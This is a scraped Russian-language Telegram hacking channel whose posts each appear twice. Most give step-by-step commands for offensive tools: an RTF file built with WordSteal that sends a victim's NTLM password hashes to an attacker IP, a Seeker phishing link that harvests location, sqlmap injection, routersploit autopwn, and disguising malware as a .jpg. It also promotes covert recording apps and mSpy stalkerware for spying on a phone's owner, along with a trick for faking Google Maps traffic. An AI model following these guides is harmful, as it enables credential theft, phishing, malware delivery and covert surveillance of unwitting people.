Тестируем роутер на уязвимости со смартфона
Читатели моего канала не понаслышке знают, что, установив пароль на роутер, вы защищаете свою сеть лишь от честных людей. Многие роутеры уже «из коробки» имеют ряд уязвимостей, которые можно отключить в настройках. Например, уязвимость удаленного доступа, стандартный пароль в локальной сети и т.д.
Чтобы проверить роутер на различные виды уязвимостей, можно воспользоваться утилитой routersploit на termux.
Настройка
Устанавливаем Termux и подключаемся к роутеру.
Прописываем команды в консоль:
▫️
▫️
▫️
#безопасность
Читатели моего канала не понаслышке знают, что, установив пароль на роутер, вы защищаете свою сеть лишь от честных людей. Многие роутеры уже «из коробки» имеют ряд уязвимостей, которые можно отключить в настройках. Например, уязвимость удаленного доступа, стандартный пароль в локальной сети и т.д.
Чтобы проверить роутер на различные виды уязвимостей, можно воспользоваться утилитой routersploit на termux.
Настройка
Устанавливаем Termux и подключаемся к роутеру.
Прописываем команды в консоль:
▫️
pkg upgrade
▫️pkg install git python
▫️git clone https://github.com/threat9/routersploit
▫️cd routersploit
▫️pip3 install -r requirements.txt
▫️python3 rsf.py
Использование▫️
use scanners/autopwn
Есть 2 вида шлюза. 192.168.0.1 и 192.168.1.1. Выбирайте ваш и пишите:▫️
set target 192.168.0.1
▫️run
Далее будет произведено сканирование на уязвимости. Если вы их обнаружите, то пишите название уязвимости в поисковике Google и ищите методы их устранения. #безопасность
Где найти вирусы с исходным кодом
Отыскать сборник актуальных вирусов, а уж тем более с описанием и исходниками — задача не из легких. Но только не для подписчиков CODE RED!
Изначально проект TheZoo создан для того, чтобы сделать анализ вредоносных программ открытым и доступным для общественности. Авторы постоянно обновляют и дополняют свою базу новыми вирусами. Для скачивания и изучения предлагается как исполняемый файл, так и исходники.
Исходный код вирусов находятся в каталоге:
Подробное описание и руководство, вы сможете найти в описании проекта на Githab.
📌https://github.com/ytisf/theZoo
❗️Напомню, использовать вирусы против других - незаконно и не рекомендуется!
#хакинг
Отыскать сборник актуальных вирусов, а уж тем более с описанием и исходниками — задача не из легких. Но только не для подписчиков CODE RED!
Изначально проект TheZoo создан для того, чтобы сделать анализ вредоносных программ открытым и доступным для общественности. Авторы постоянно обновляют и дополняют свою базу новыми вирусами. Для скачивания и изучения предлагается как исполняемый файл, так и исходники.
Исходный код вирусов находятся в каталоге:
theZoo/malwares/Source/Original/
Исполняемые файлы вирусов находятся в каталоге:theZoo/malwares/Binaries/
Для каждого вируса есть своя отдельная директория, в которой находятся 4 файла: само вредоносное ПО в зашифрованном виде, в ZIP архиве, SHA256 и MD5 — контрольные суммы архива для сравнения и пароль для зашифрованного архива.Подробное описание и руководство, вы сможете найти в описании проекта на Githab.
📌https://github.com/ytisf/theZoo
❗️Напомню, использовать вирусы против других - незаконно и не рекомендуется!
#хакинг
Каждый 142 пароль - 123456. Как создавать безопасные пароли?
Эксперт в области Компьютерных Технологий - Ата Хаксил провел исследование на тему использования паролей. Под его анализ попало более 1 миллиарда слитых учетных данных!
Ата анализировал доступные в Сети БД — часть из них, например, лежала на GitHub и GitLab, другая часть распространялась через хакерские форумы и файлообменники.
Специалист проанализировал более миллиарда связок и выяснил, что только 168 919 919 паролей являются уникальными. А «123456» эксперт встретил целых 7 миллионов раз.
Кроме того, автор исследования установил среднюю длину паролей – 9,48 символов (часто рекомендуется использовать от 16 и до 24 символов).
Только 12% комбинаций при этом содержали специальные символы. 29% паролей состояли только из букв, 13% – только из цифр. Разумеется, в подборе таких паролей нет ничего сложного.
P.S. Ниже я приложил схему, наглядно демонстрирующую, каких еще ошибок стоит избегать при создании паролей.
#полезно #безопасность
Эксперт в области Компьютерных Технологий - Ата Хаксил провел исследование на тему использования паролей. Под его анализ попало более 1 миллиарда слитых учетных данных!
Ата анализировал доступные в Сети БД — часть из них, например, лежала на GitHub и GitLab, другая часть распространялась через хакерские форумы и файлообменники.
Специалист проанализировал более миллиарда связок и выяснил, что только 168 919 919 паролей являются уникальными. А «123456» эксперт встретил целых 7 миллионов раз.
Кроме того, автор исследования установил среднюю длину паролей – 9,48 символов (часто рекомендуется использовать от 16 и до 24 символов).
Только 12% комбинаций при этом содержали специальные символы. 29% паролей состояли только из букв, 13% – только из цифр. Разумеется, в подборе таких паролей нет ничего сложного.
P.S. Ниже я приложил схему, наглядно демонстрирующую, каких еще ошибок стоит избегать при создании паролей.
#полезно #безопасность
Делаем SQL инъекцию с помощью телефона
SQL инъекция — это один из самых доступных способов взлома сайта. Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения Cookie) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это MySQL) что угодно. Данная атака позволяет находить базы данных пользователей различных сайтов, обходить авторизацию, тестировать ресурсы и многое другое.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
▫️
📌 https://github.com/sqlmapproject/sqlmap/wiki/Usage
❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.
#хакинг
SQL инъекция — это один из самых доступных способов взлома сайта. Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения Cookie) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это MySQL) что угодно. Данная атака позволяет находить базы данных пользователей различных сайтов, обходить авторизацию, тестировать ресурсы и многое другое.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
pkg upgrade
▫️pkg install python2 git
▫️git clone https://github.com/sqlmapproject/sqlmap.git
▫️cd sqlmap
Использование▫️
python2 sqlmap.py -u <url уязвимого веб-сайта>
Подробный список команд📌 https://github.com/sqlmapproject/sqlmap/wiki/Usage
❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.
#хакинг
Как расшифровать короткую ссылку
Довольно часто бывают ситуации, когда ссылки на какой-нибудь сайт получаются очень уж длинными, и потому неудобными для того, чтобы делиться ими с кем-то. Для таких ситуаций и были созданы короткие ссылки.
Но, как и многое другое в этом мире, этот инструмент имеет и «темную сторону» сторону. Дело в том, что переходя по короткой ссылке, человек понятния не имеет, куда, собственно, он переходит. А увидит он это только после совершения самого перехода.
В итоге, кликая по короткой ссылке, можно запросто оказаться на каком-нибудь зловредном ресурсе, где от вирусов и прочей малвари не будет отбоя.
Чтобы избежать неприятных ситуаций, описанных выше, воспользуемся ресурсом, который дешифрует ссылки. Кстати, ресурс позволяет «за одно» проверить ссылку на вирусы и показывает цепочку перенаправлений.
👺А вот и небольшой тест работоспособности ресурса. Куда приведет эта ссылка? 👉 shorturl.at/yzGQR
📌 https://longurl.info/
#хитрости #безопасность
Довольно часто бывают ситуации, когда ссылки на какой-нибудь сайт получаются очень уж длинными, и потому неудобными для того, чтобы делиться ими с кем-то. Для таких ситуаций и были созданы короткие ссылки.
Но, как и многое другое в этом мире, этот инструмент имеет и «темную сторону» сторону. Дело в том, что переходя по короткой ссылке, человек понятния не имеет, куда, собственно, он переходит. А увидит он это только после совершения самого перехода.
В итоге, кликая по короткой ссылке, можно запросто оказаться на каком-нибудь зловредном ресурсе, где от вирусов и прочей малвари не будет отбоя.
Чтобы избежать неприятных ситуаций, описанных выше, воспользуемся ресурсом, который дешифрует ссылки. Кстати, ресурс позволяет «за одно» проверить ссылку на вирусы и показывает цепочку перенаправлений.
👺А вот и небольшой тест работоспособности ресурса. Куда приведет эта ссылка? 👉 shorturl.at/yzGQR
📌 https://longurl.info/
#хитрости #безопасность
Скачал книгу? Твои пароли уже у хакеров
Возможность интегрировать в RTF файл тот же стиллер поставила под угрозу пользователей, качающих электронные книги в этом формате. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.
Утилита WordSteal может наглядно продемонстрировать работу уязвимости RTF. Она с легкостью вошьет стиллер в RTF файл с картинкой. Когда условная жертва откроет этот файл, хакер удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:
Настройка
Устанавливаем Kali Linux
Для начала установим репозиторий и обновим права доступа
◽
◽
Использование
Для создания RTF файла со стиллером нам понадобится только картинка.
◽
После выполнения этой команды в директории появится RTF файл с полезной нагрузкой. Чтобы её испытать, нужно не закрывая окно терминала открыть данный файл на Windows. В терминал придут хеши паролей.
❗️Чтобы за «бесплатные» книги не пришлось дорого расплачиваться, скачивать их стоит из Архива хакера - @hackrhive
#хакинг #безопасность
Возможность интегрировать в RTF файл тот же стиллер поставила под угрозу пользователей, качающих электронные книги в этом формате. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.
Утилита WordSteal может наглядно продемонстрировать работу уязвимости RTF. Она с легкостью вошьет стиллер в RTF файл с картинкой. Когда условная жертва откроет этот файл, хакер удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:
Настройка
Устанавливаем Kali Linux
Для начала установим репозиторий и обновим права доступа
◽
git clone https://github.com/0x09AL/WordSteal.git◽
chmod +x main.pyИспользование
Для создания RTF файла со стиллером нам понадобится только картинка.
◽
python main.py <ip хоста> <название картинки> 1После выполнения этой команды в директории появится RTF файл с полезной нагрузкой. Чтобы её испытать, нужно не закрывая окно терминала открыть данный файл на Windows. В терминал придут хеши паролей.
❗️Чтобы за «бесплатные» книги не пришлось дорого расплачиваться, скачивать их стоит из Архива хакера - @hackrhive
#хакинг #безопасность
Расширения. Автоматически «подтираем» Cookie
Большинство современных браузеров позволяет пользователям выбрать — принимать cookie или нет, но их отключение делает невозможной работу с некоторыми сайтами. Кроме того, по законам некоторых стран (например, по закону Евросоюза) ресурсы должны в обязательном порядке запрашивать согласие перед установкой cookie.
Но сайты все же умудряются собирать эти «лакомства». Дело в том, что Cookie легко перехватить и подменить, если пользователь использует нешифрованное соединение с сервером. В группе риска пользователи, выходящие в интернет при помощи публичных точек доступа Wi-Fi и не использующие при этом таких механизмов, как SSL и TLS.
Простой пример: пароли , которые вы ввели в браузер, хранятся в Cookie, и их можно легко "вытащить" с помощью обычного стиллера.
Чтобы избежать подобных неприятностей, стоит воспользоваться расширением Cookie AutoDelete. С его помощью можно полностью контролировать Cookie - от блокировок для отдельных ресурсов и до автоматического удаления.
📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка
#расширения #приватность #безопасность
Большинство современных браузеров позволяет пользователям выбрать — принимать cookie или нет, но их отключение делает невозможной работу с некоторыми сайтами. Кроме того, по законам некоторых стран (например, по закону Евросоюза) ресурсы должны в обязательном порядке запрашивать согласие перед установкой cookie.
Но сайты все же умудряются собирать эти «лакомства». Дело в том, что Cookie легко перехватить и подменить, если пользователь использует нешифрованное соединение с сервером. В группе риска пользователи, выходящие в интернет при помощи публичных точек доступа Wi-Fi и не использующие при этом таких механизмов, как SSL и TLS.
Простой пример: пароли , которые вы ввели в браузер, хранятся в Cookie, и их можно легко "вытащить" с помощью обычного стиллера.
Чтобы избежать подобных неприятностей, стоит воспользоваться расширением Cookie AutoDelete. С его помощью можно полностью контролировать Cookie - от блокировок для отдельных ресурсов и до автоматического удаления.
📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка
#расширения #приватность #безопасность
Apple выпустили «хакерский» IPhone
На прошлой неделе компания Apple объявила об официальном запуске программы Security Research Device (SRD), которую анонсировали еще в прошлом году. В рамках этой инициативы избранным исследователям предоставят специальные версии iPhone.
У таких устройств отключено большинство функций безопасности, и инженеры Apple используют эти девайсы для поиска проблем.
Кстати, ранее такие девайсы нередко попадали на черный рынок, где они продавались за немалые деньги, и порой оказывались в руках брокеров уязвимостей или продавцов 0-day.
Исследователям предлагается подать заявку на участие в SRD, причем для этого необязательно иметь некое профильное образование и кучу дипломов. Достаточно обладать подтвержденным опытом в сфере ИБ-исследований, причем не только iPhone, но и других устройств и ПО, включая Android, Windows и Linux.
На прошлой неделе компания Apple объявила об официальном запуске программы Security Research Device (SRD), которую анонсировали еще в прошлом году. В рамках этой инициативы избранным исследователям предоставят специальные версии iPhone.
У таких устройств отключено большинство функций безопасности, и инженеры Apple используют эти девайсы для поиска проблем.
Кстати, ранее такие девайсы нередко попадали на черный рынок, где они продавались за немалые деньги, и порой оказывались в руках брокеров уязвимостей или продавцов 0-day.
Исследователям предлагается подать заявку на участие в SRD, причем для этого необязательно иметь некое профильное образование и кучу дипломов. Достаточно обладать подтвержденным опытом в сфере ИБ-исследований, причем не только iPhone, но и других устройств и ПО, включая Android, Windows и Linux.
This media is not supported in your browser
VIEW IN TELEGRAM
Интересуешься взломом, хакингом и другой теневой деятельностью?
Тогда однозначно рекомендую тебе читать FCS!
Только авторские статьи с закрытых форумов, отдельное комьюнити для общения и много разных плюшек;
Действуй 👉 https://t.me/joinchat/AAAAAE3S7jMotXfNnS61Lg
Тогда однозначно рекомендую тебе читать FCS!
Только авторские статьи с закрытых форумов, отдельное комьюнити для общения и много разных плюшек;
Действуй 👉 https://t.me/joinchat/AAAAAE3S7jMotXfNnS61Lg
Узнаем местоположение по ссылке
При переходе на тот или иной сайт у вас может запрашиваться дополнительная информация в виде камеры, местоположения и т.д. Благодаря этой фиче можно создавать различные фишинг страницы для сбора информации. Утилита Seeker специализируется именно на получении местоположения жертвы.
Он работает на ngrok, генерируя уникальную фишинг ссылку. Перейдя по ней, первым делом появится окно с подтверждением местоположения. Даже если жертва откажется передавать информацию, атакующий все равно получит данные об устройстве. В ином случае местоположение пользователя будет определено с точностью до 30 метров и отправлено на удаленный сервер.
Установка
Устанавливаем Kali Linux
Скачиваем Seeker и ставим права на установщик
◽
◽
◽
Запускаем установщик командой
◽
Использование
Seeker максимально автоматизирован, поэтому для запуска хватит одной команды
◽
После окончания запуска в терминале появится фишинговая ссылка.
#хакинг
При переходе на тот или иной сайт у вас может запрашиваться дополнительная информация в виде камеры, местоположения и т.д. Благодаря этой фиче можно создавать различные фишинг страницы для сбора информации. Утилита Seeker специализируется именно на получении местоположения жертвы.
Он работает на ngrok, генерируя уникальную фишинг ссылку. Перейдя по ней, первым делом появится окно с подтверждением местоположения. Даже если жертва откажется передавать информацию, атакующий все равно получит данные об устройстве. В ином случае местоположение пользователя будет определено с точностью до 30 метров и отправлено на удаленный сервер.
Установка
Устанавливаем Kali Linux
Скачиваем Seeker и ставим права на установщик
◽
git clone https://github.com/thewhiteh4t/seeker.git◽
cd seeker/◽
chmod 777 install.shЗапускаем установщик командой
◽
./install.shИспользование
Seeker максимально автоматизирован, поэтому для запуска хватит одной команды
◽
python seeker.pyПосле окончания запуска в терминале появится фишинговая ссылка.
#хакинг
Как узнать кто владелец сайта
Самый простой способ определить владельца домена – использовать WHOIS – сетевой протокол, который открывает доступ к публичным базам регистраторов IP и доменных имен.
Возможно это благодаря тому, что обязательным правилом регистрации домена является указание своей контактной информации, которая хранится у регистраторов доменных имен, а также содержится в whois-базах.
Этих баз с информацией о доменах множество и они обновляются по мере обновления информации о домене.
Наиболее популярными являются:
📌https://www.whois.net/
📌https://www.whois.com/whois/
📌https://whois.icann.org/ru
📌https://who.is/
Какой базой пользоваться – решать вам, но рекомендую проверять домен в нескольких базах сразу, т.к. данные этих ресурсов обновляются с различной частотой.
#хитрости
Самый простой способ определить владельца домена – использовать WHOIS – сетевой протокол, который открывает доступ к публичным базам регистраторов IP и доменных имен.
Возможно это благодаря тому, что обязательным правилом регистрации домена является указание своей контактной информации, которая хранится у регистраторов доменных имен, а также содержится в whois-базах.
Этих баз с информацией о доменах множество и они обновляются по мере обновления информации о домене.
Наиболее популярными являются:
📌https://www.whois.net/
📌https://www.whois.com/whois/
📌https://whois.icann.org/ru
📌https://who.is/
Какой базой пользоваться – решать вам, но рекомендую проверять домен в нескольких базах сразу, т.к. данные этих ресурсов обновляются с различной частотой.
#хитрости
Расширения. Подмена часового пояса браузера
Для того, чтобы лучше скрыть цифровой отпечаток браузера, можно использовать расширение, которое называется «Spoof Timezone».
Его основная задача состоит в фиксированной подмене часового пояса браузера до определенного пользователем значения, посредством изоляции методов отслеживания «Date» и «Intl» из JavaScript. Расширение также поддерживает и случайную подмену часового пояса, которая используется, чтобы веб-сайты не брали ваш текущий часовой пояс как элемент уникальной идентификации вашего браузера.
Настройка
1. Качаем расширение для своего браузера по данной ссылке.
2. Нажимаем правой кнопкой мыши по расширению и выбираем пункт «Параметры».
3. В первом поле выбираем нужный часовой пояс, а затем нажимаем кнопку «Save».
Готово, теперь все веб-сайты будут видеть только тот часовой пояс, что вы выбрали сами. Чтобы включить случайную подмену пояса, которая будет автоматический обновляться, достаточно активировать последнюю галочку в параметрах расширения.
📌https://add0n.com/spoof-timezone.html
#расширения #приватность
Для того, чтобы лучше скрыть цифровой отпечаток браузера, можно использовать расширение, которое называется «Spoof Timezone».
Его основная задача состоит в фиксированной подмене часового пояса браузера до определенного пользователем значения, посредством изоляции методов отслеживания «Date» и «Intl» из JavaScript. Расширение также поддерживает и случайную подмену часового пояса, которая используется, чтобы веб-сайты не брали ваш текущий часовой пояс как элемент уникальной идентификации вашего браузера.
Настройка
1. Качаем расширение для своего браузера по данной ссылке.
2. Нажимаем правой кнопкой мыши по расширению и выбираем пункт «Параметры».
3. В первом поле выбираем нужный часовой пояс, а затем нажимаем кнопку «Save».
Готово, теперь все веб-сайты будут видеть только тот часовой пояс, что вы выбрали сами. Чтобы включить случайную подмену пояса, которая будет автоматический обновляться, достаточно активировать последнюю галочку в параметрах расширения.
📌https://add0n.com/spoof-timezone.html
#расширения #приватность
Маскируем .exe в .jpg
Благодаря встроенным возможностям Windows любой .ехе файл можно замаскировать под другое расширение. Делается это с помощью программы Neanderthal.
Установка
Программа распространяется архивом с вложенными модулями. Чтобы активировать эти модули, нужно установить зависимости из файла Registratot.OCX.exe.
Использование
Перед маскировкой в .jpg вирус необходимо склеить с картинкой. Для этого используется WinRAR с функцией создания SFX архива. В пункте "Установка" прописывается названия файла вируса и картинки. На выходе получается тот же .ехе файл, при запуске которого открывается и вирус и картинка одновременно.
Процесс маскировки осуществляется программой Neanderthal.exe. После открытия выбирается созданный SFX архив и в графе Extension указывается нужное расширение. После нажатия кнопки Change Extension появится новый файл с подобным названием exe.jpg12345. Все что останется, это поставить каретку перед exe и что либо написать. В итоге может получиться что-то похожее на twegswexe.jpg.
Готово! Файл замаскирован.
📌 https://yadi.sk/d/vq8H5Vo43GGC48
#хакинг #хитрости
Благодаря встроенным возможностям Windows любой .ехе файл можно замаскировать под другое расширение. Делается это с помощью программы Neanderthal.
Установка
Программа распространяется архивом с вложенными модулями. Чтобы активировать эти модули, нужно установить зависимости из файла Registratot.OCX.exe.
Использование
Перед маскировкой в .jpg вирус необходимо склеить с картинкой. Для этого используется WinRAR с функцией создания SFX архива. В пункте "Установка" прописывается названия файла вируса и картинки. На выходе получается тот же .ехе файл, при запуске которого открывается и вирус и картинка одновременно.
Процесс маскировки осуществляется программой Neanderthal.exe. После открытия выбирается созданный SFX архив и в графе Extension указывается нужное расширение. После нажатия кнопки Change Extension появится новый файл с подобным названием exe.jpg12345. Все что останется, это поставить каретку перед exe и что либо написать. В итоге может получиться что-то похожее на twegswexe.jpg.
Готово! Файл замаскирован.
📌 https://yadi.sk/d/vq8H5Vo43GGC48
#хакинг #хитрости
Список полезных onion сайтов в сети Tor
В данном посте пойдет речь о небольшой части сайтов, которые могут оказаться для вас полезными, если вы пользуйтесь зашифрованной сетью:
NotEvil — одна из самых крупных поисковых систем. Большое количество проиндексированных страниц.
OnionShare — утилита с открытым исходным текстом, которая позволяет безопасно и анонимно делиться файлами любого размера.
Security in a Box — содержит множество инструкций по установке и использованию программного обеспечения и сервисов для цифровой защиты.
Confidant — электронная почта с открытым исходным кодом и функцией антиспама. Сообщения хранятся зашифрованными, администраторы не имеют доступа к содержимому.
RuTor — зеркало популярного русскоязычного торрент-трекера. Не раз подвергался блокировкам из за антипиратского законодательства, но продолжает жить до сих пор.
CrypTor — сервис одноразовых записок с шифрованием. Есть возможность прикрепления своих файлов размером до 3 мегабайт. Для работы используется Javascript.
#полезно
В данном посте пойдет речь о небольшой части сайтов, которые могут оказаться для вас полезными, если вы пользуйтесь зашифрованной сетью:
NotEvil — одна из самых крупных поисковых систем. Большое количество проиндексированных страниц.
OnionShare — утилита с открытым исходным текстом, которая позволяет безопасно и анонимно делиться файлами любого размера.
Security in a Box — содержит множество инструкций по установке и использованию программного обеспечения и сервисов для цифровой защиты.
Confidant — электронная почта с открытым исходным кодом и функцией антиспама. Сообщения хранятся зашифрованными, администраторы не имеют доступа к содержимому.
RuTor — зеркало популярного русскоязычного торрент-трекера. Не раз подвергался блокировкам из за антипиратского законодательства, но продолжает жить до сих пор.
CrypTor — сервис одноразовых записок с шифрованием. Есть возможность прикрепления своих файлов размером до 3 мегабайт. Для работы используется Javascript.
#полезно
Как сбросить root пароль Kali Linux без аутентификации
Операционная система Linux спроектирована с ориентиром на максимальную безопасность, поэтому в ней у каждого пользователя есть пароль. Процессы аутентификации и смены пароля лежат на уровне системы.
Поэтому, если вы забыли root пароль на Kali Linux (либо вовсе никогда его и не знали), для начала необходимо запустить систему и дождаться открытия GNU GRUB.
Затем нужно нажать на 'E' тем самым открыв конфиг загрузчика.
В открывшимся окне нужно найти строку, которая начинается на
Откроется терминал. В нем нужно сначала перемонтировать систему на чтение-запись командой
◽
Потом просто вводим команду
◽
И прописываем два раза новый пароль. После подтверждения можно сделать перезапуск командой
◽
Готово! Новый пароль установлен.
#kali #хитрости
Операционная система Linux спроектирована с ориентиром на максимальную безопасность, поэтому в ней у каждого пользователя есть пароль. Процессы аутентификации и смены пароля лежат на уровне системы.
Поэтому, если вы забыли root пароль на Kali Linux (либо вовсе никогда его и не знали), для начала необходимо запустить систему и дождаться открытия GNU GRUB.
Затем нужно нажать на 'E' тем самым открыв конфиг загрузчика.
В открывшимся окне нужно найти строку, которая начинается на
linux /boot/vmlinuz-3.18. В конце неё нужно поставить пробел, вписать single init=/bin/bash и нажать F10.Откроется терминал. В нем нужно сначала перемонтировать систему на чтение-запись командой
◽
mount -rw -o remount /Потом просто вводим команду
◽
passwd rootИ прописываем два раза новый пароль. После подтверждения можно сделать перезапуск командой
◽
shutdown -h nowГотово! Новый пароль установлен.
#kali #хитрости
Как записать видео с заблокированным экраном
В наши дни практически любой гаджет - это «двойной агент». Он может шпионить за вами, либо вы можете шпионить с его помощью. Сегодня разберем второй случай.
Данная утилита помогает осуществлять видеосъемку в фоновом режиме. В ее функционал входят такие интересные возможности, как скрытие окна предпросмотра, отключение звука затвора, автоматическая активация и скрытие файлов из галереи или всей системы.
Quick Video Recorder отличается своими обширными возможностями по настройке. К примеру, приложение позволяет создать активатор записи, замаскированный под фонарик или карту. Тем самым, минимизируя вероятность быть пойманным на съемке.
В дополнение к этому, присутствует и выбор камеры — фронтальная, тыльная, широкоугольная, включение фонарика во время записи, режим автофокусировки и стабилизации видео, а также выбор ориентации вне зависимости от того, как «повернут» ваш смартфон.
📌 https://4pda.ru/forum/index.php?showtopic=736275&st=0
#приложения #android #слежка
В наши дни практически любой гаджет - это «двойной агент». Он может шпионить за вами, либо вы можете шпионить с его помощью. Сегодня разберем второй случай.
Данная утилита помогает осуществлять видеосъемку в фоновом режиме. В ее функционал входят такие интересные возможности, как скрытие окна предпросмотра, отключение звука затвора, автоматическая активация и скрытие файлов из галереи или всей системы.
Quick Video Recorder отличается своими обширными возможностями по настройке. К примеру, приложение позволяет создать активатор записи, замаскированный под фонарик или карту. Тем самым, минимизируя вероятность быть пойманным на съемке.
В дополнение к этому, присутствует и выбор камеры — фронтальная, тыльная, широкоугольная, включение фонарика во время записи, режим автофокусировки и стабилизации видео, а также выбор ориентации вне зависимости от того, как «повернут» ваш смартфон.
📌 https://4pda.ru/forum/index.php?showtopic=736275&st=0
#приложения #android #слежка
Google заблокировала более 2500 YouTube-каналов за распространение дезинформации
Специалисты Google Threat Analysis Group отчитались о работе, проделанной во втором квартале 2020 года. Исследователи рассказали о том, как они останавливают атаки правительственных хакеров и кампании по дезинформации, некоторые из которых были выявлены экспертами сторонних компаний (например, Graphika и FireEye).
Исследователи пишет, что помешали ряду иностранных операций по оказанию влияния, за которыми стояли Китай, Россия, Иран и Тунис. В результате было заблокировано более 2500 каналов на YouTube, несколько аккаунтов AdSense, Play Developer и рекламных учетных записей.
Так, 2596 заблокированных каналов якобы были связаны с кампаниями по распространению дезинформации, за которыми стоял Китай, еще 86 каналов на YouTube якобы координировались из России и 19 каналов, якобы использовали Ираном для различных операций по оказанию влияния.
К примеру, аналитики пишут, что китайские спецслужбы в основном концентрировались на загрузке спамерского и неполитического контента, с очень небольшими вкраплениями политического контента на китайском языке.
Российские операции, по данным Google TAG, строились вокруг распространения контента, в основном посвященного внутренней российской и международной политике. Также были замечены кампании по размещению комментариев под различными русскоязычными видео.
Специалисты Google Threat Analysis Group отчитались о работе, проделанной во втором квартале 2020 года. Исследователи рассказали о том, как они останавливают атаки правительственных хакеров и кампании по дезинформации, некоторые из которых были выявлены экспертами сторонних компаний (например, Graphika и FireEye).
Исследователи пишет, что помешали ряду иностранных операций по оказанию влияния, за которыми стояли Китай, Россия, Иран и Тунис. В результате было заблокировано более 2500 каналов на YouTube, несколько аккаунтов AdSense, Play Developer и рекламных учетных записей.
Так, 2596 заблокированных каналов якобы были связаны с кампаниями по распространению дезинформации, за которыми стоял Китай, еще 86 каналов на YouTube якобы координировались из России и 19 каналов, якобы использовали Ираном для различных операций по оказанию влияния.
К примеру, аналитики пишут, что китайские спецслужбы в основном концентрировались на загрузке спамерского и неполитического контента, с очень небольшими вкраплениями политического контента на китайском языке.
Российские операции, по данным Google TAG, строились вокруг распространения контента, в основном посвященного внутренней российской и международной политике. Также были замечены кампании по размещению комментариев под различными русскоязычными видео.
Новая уязвимость Google Map. Создаем пробки с помощью одного ПК
Несколько месяцев назад немецкий художник Саймон Векерт разгуливал по свободным дорога Берлина с тележкой. В ней лежало 99 смартфонов с включенным GPS. Результатом такой прогулки стал максимальный уровень пробок отображаемый в Гугл Картах, хотя на улице кроме Саймона с тележкой никого не было.
Этот баг похож на предыдущий с переименовыванием различных зданий, и в его механика также лежит банальнейшая недоработка. Настолько, что заполнить трафик улиц в Google Map можно, имея под рукой только ПК.
Настройка
Для начала нужно скачать эмулятор NOX.
Скачали, запускаем и нажимаем на третий снизу значок правой панели - это раздел "Мультиплеер Nox".
Откроется небольшое окно. Далее нужно кликнуть по троеточию рядом с кнопкой "Добавить эмулятор".
На открывшейся форме выбираем Android 7. Жмем создать эмулятор. После загрузки всех пакетов появится строка с созданной виртуалкой. Запускаем её.
Откроется стандартный рабочий стол Андроида. Теперь нужно скачать Lockito, Google Maps и Яндекс.Навигатор.
Дальше в настройках в пункте "Для разработчиков" выбираем Lockito в качестве приложения для фиктивных местоположений.
Использование
Заходим в Lockito, выстраиваем маршрут, задаём скорость. После чего в разделе "Мультиплеер Nox" кликаем на "Настройки мультиплеера".
Выставляем нужное кол-во копий в "Настройки партий". Сохраняем, кликаем по "Пакетная операция", "Копировать".
Далее останется в каждой копии вручную позапускать маршруты в Lockito.
Фейковая пробка создана!
Несколько месяцев назад немецкий художник Саймон Векерт разгуливал по свободным дорога Берлина с тележкой. В ней лежало 99 смартфонов с включенным GPS. Результатом такой прогулки стал максимальный уровень пробок отображаемый в Гугл Картах, хотя на улице кроме Саймона с тележкой никого не было.
Этот баг похож на предыдущий с переименовыванием различных зданий, и в его механика также лежит банальнейшая недоработка. Настолько, что заполнить трафик улиц в Google Map можно, имея под рукой только ПК.
Настройка
Для начала нужно скачать эмулятор NOX.
Скачали, запускаем и нажимаем на третий снизу значок правой панели - это раздел "Мультиплеер Nox".
Откроется небольшое окно. Далее нужно кликнуть по троеточию рядом с кнопкой "Добавить эмулятор".
На открывшейся форме выбираем Android 7. Жмем создать эмулятор. После загрузки всех пакетов появится строка с созданной виртуалкой. Запускаем её.
Откроется стандартный рабочий стол Андроида. Теперь нужно скачать Lockito, Google Maps и Яндекс.Навигатор.
Дальше в настройках в пункте "Для разработчиков" выбираем Lockito в качестве приложения для фиктивных местоположений.
Использование
Заходим в Lockito, выстраиваем маршрут, задаём скорость. После чего в разделе "Мультиплеер Nox" кликаем на "Настройки мультиплеера".
Выставляем нужное кол-во копий в "Настройки партий". Сохраняем, кликаем по "Пакетная операция", "Копировать".
Далее останется в каждой копии вручную позапускать маршруты в Lockito.
Фейковая пробка создана!
Отслеживание смартфона с помощью приложения
Существует специальное программное обеспечение для мобильных устройств, которое называется «mSpy». Оно позволяет полностью отслеживать все действия на смартфоне целевого пользователя, при этом позиционируя себя, как инструмент родительского контроля.
Одной из отличительных черт приложения является то, что оно способно работать в скрытом режиме. При этом, вам будут доступны все функции устройства, а именно слежка за SMS и MMS, прослушка телефонных звонков, мониторинг текущего местоположения, контроль социальных сетей и доступ к переписке в популярных мессенджерах.
Также, стоит отметить, что mSpy позволяет отслеживать историю браузера, что позволит понять, какие сайты предпочитает посещать пользователь. В дополнении, приложение предлагает функцию мониторинга окружения, которая позволяет записывать на диктофон или на видео то, что происходит вокруг целевого устройства.
Программа совместима как с Android, так и с iOS системами. Единственным недостатком будет тот факт, что утилиту нужно покупать. Хотя, почему бы за хороший продукт и не заплатить?
📌https://www.mspy.com/
#приложения #слежка
Существует специальное программное обеспечение для мобильных устройств, которое называется «mSpy». Оно позволяет полностью отслеживать все действия на смартфоне целевого пользователя, при этом позиционируя себя, как инструмент родительского контроля.
Одной из отличительных черт приложения является то, что оно способно работать в скрытом режиме. При этом, вам будут доступны все функции устройства, а именно слежка за SMS и MMS, прослушка телефонных звонков, мониторинг текущего местоположения, контроль социальных сетей и доступ к переписке в популярных мессенджерах.
Также, стоит отметить, что mSpy позволяет отслеживать историю браузера, что позволит понять, какие сайты предпочитает посещать пользователь. В дополнении, приложение предлагает функцию мониторинга окружения, которая позволяет записывать на диктофон или на видео то, что происходит вокруг целевого устройства.
